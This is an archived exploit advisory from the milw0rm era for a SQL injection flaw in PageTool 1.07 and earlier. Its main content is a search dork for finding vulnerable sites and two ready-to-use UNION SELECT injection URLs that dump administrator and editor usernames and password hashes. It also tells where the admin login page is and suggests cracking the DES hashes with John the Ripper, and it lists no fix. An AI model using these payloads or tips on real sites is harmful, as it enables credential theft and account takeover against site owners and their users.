PageTool 1.07 news_id Remote SQL Injection Vulnerability

2008-01-25 00:00:00

* removed duplicate *

http://milw0rm.com/exploits/4107

/str0ke

--==+================================================================================+==--
--==+ PageTool 1.07 AND Prior SQL Injection Vulnerbility +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: www.pagetool.org
DORK: "Powered by Pagetool"


DESCRIPTION:
pull admin/user credentials from the database


EXPLOITS:
www.site.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
www.site.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/NOT/**/LIKE/**/0x2561646D696E25/*


NOTE/TIP:
admin login is at /index.php?name=pt_admin_man_en
all passwords are encrypted with the traditional DES algorithms, they can possibly be cracked with "John The Ripper"
first injection is admin, second is editors.


GREETZ: milw0rm.com, h4ck-y0u.org !



--==+================================================================================+==--
--==+ PageTool 1.07 AND Prior SQL Injection Vulnerbility +==--
--==+================================================================================+==--

#

Fixes

No fixes

In order to submit a new fix you need to be registered.